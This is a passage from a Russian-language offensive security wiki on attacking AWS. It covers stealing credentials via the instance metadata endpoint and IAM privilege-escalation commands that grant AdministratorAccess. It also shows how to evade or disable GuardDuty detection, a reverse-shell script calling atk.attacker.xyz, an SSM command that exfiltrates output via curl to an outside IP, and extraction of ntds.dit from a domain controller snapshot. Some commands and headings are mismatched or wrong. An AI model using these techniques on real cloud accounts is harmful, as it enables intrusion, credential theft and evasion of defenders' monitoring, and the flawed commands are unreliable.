"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
